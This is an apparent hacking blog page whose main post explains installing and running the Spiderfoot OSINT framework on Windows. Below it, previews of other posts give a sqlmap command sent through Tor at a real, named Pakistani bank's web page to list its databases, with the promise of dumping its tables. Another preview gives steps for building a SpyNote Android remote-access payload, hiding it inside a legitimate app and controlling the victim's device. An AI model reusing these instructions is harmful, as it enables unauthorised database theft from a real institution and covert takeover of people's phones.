Skip to main content

Using Spiderfoot (OSINT Framework)

Open Source Intelligence Gathering

Requirements:

1. SPIDERFOOT - Download
2. WINDOWS 10
3. PYTHON (I prefer ANACONDA) - Download

STEP 1:

Download the open source version of Spiderfoot from the above given link.
(SHIFT + Right Click) to get the power shell option in menu.

STEP 2: 

Open PowerShell and type the following commands

Case 1: If you are using just python

pip3 install -r requirements.txt

Case 2: If you are using Anaconda ( my case ) 

pip install -r requirements.txt --user

STEP 3:

Once its done installing all the dependencies, execute the following command to start the web interface-

python sf.py -l 127.0.0.1:5001

Now open any browser and open http://127.0.0.1:5001


STEP 4:

Adding up API keys. To get the API key you need to register in the given service and get the API key.
Paste the API key into relevant box and click on SAVE.
The more API keys you will add the more detailed output you will get. ☺

STEP 5:

Starting a Scan. Go-To the New Scan tab and provide the details of the target. You can select all the modules or just do module specific scan.
CLICK on SCAN

Reviews and Comments will be appreciated. Thanks ☺

Comments

Popular posts from this blog

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=...

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java  STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default.   STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created  . STEP 5:  Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...

NMAP - NSE Scripts (Advanced)

Vulnerability scanning using NSE in Nmap.  Note: I have written this tutorial taking the fact into consideration that the user is well versed with basic NMAP commands. For basic NMAP commands please refer the cheat-sheet given below: Basic Scanning Techniques • Scan a single target :                                                                   nmap [target] • Scan multiple targets:                                                                nmap [target1,target2,etc] • Scan a list of targets                                               ...